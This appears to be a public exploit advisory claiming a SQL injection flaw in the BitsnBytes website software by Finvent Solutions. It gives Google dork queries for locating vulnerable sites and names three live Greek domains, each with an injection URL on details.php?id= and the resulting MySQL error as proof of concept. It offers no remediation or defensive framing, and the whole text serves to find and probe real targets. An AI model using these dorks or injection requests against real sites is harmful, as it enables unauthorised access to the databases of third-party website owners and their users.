####################################################################################### # Exploit Title : Greece BitsnBytes Powered by Byte © Finvent Solutions SQL Injection Vulnerability # Author : KingSkrupellos from Cyberizm Digital Security Team # Date : 26/05/2018 # Vendor Homepages : bitsnbytes.gr / finvent.gr # Exploit Risk : Medium ####################################################################################### # Google Dork 1 : inurl:''/details.php?id='' site:gr # Google Dork 2 : intext:''BitsnBytes | Powered by Byte ©'' ######################################################################################## # Example Sites => # finvent.gr/details.php?id=20%27 [ Proof of Concept SQL Injection ] => archive.is/Sg8iJ # Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''20''' at line 1 # sea.org.gr/details.php?id=626%27 => [ Proof of Concept SQL Injection ] => archive.is/yTLXx # Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 # sysp.gr/details.php?id=852%27 => [ Proof of Concept SQL Injection ] => archive.is/PDxwY # Error => You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 ####################################################################################### # Discovered By KingSkrupellos from Cyberizm Digital Security Team